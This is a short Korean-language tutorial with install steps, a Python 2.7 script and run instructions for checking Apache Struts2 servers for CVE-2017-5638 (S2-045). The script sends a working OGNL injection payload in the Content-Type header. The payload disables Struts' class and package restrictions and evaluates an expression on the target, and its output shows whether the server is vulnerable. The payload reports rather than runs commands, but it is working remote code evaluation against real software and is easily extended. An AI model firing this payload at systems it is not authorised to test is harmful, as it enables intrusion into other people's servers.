Apache Struts2 취약점 jakarta (CVE-2017-5638) POC

python 2.7 설치

CMD창 명령어 입력

c:\Python27\python.exe -m pip install requests

CVE-2017-5638.py 생성

import requests   import sys     def poc(url):       payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"       headers = {}       headers["Content-Type"] = payload       r = requests.get(url, headers=headers)       if "105059592" in r.content:           return True         return False       if __name__ == '__main__':       if len(sys.argv) == 1:           print "python s2-045.py target"           sys.exit()       if poc(sys.argv[1]):           print "vulnerable"       else:           print "not vulnerable"

CMD창 명령어 입력

CVE-2017-5638.py http://xxx.xxx.xxx.xxx

not vulnerable 나오면 미취약

vulnerable 나오면 취약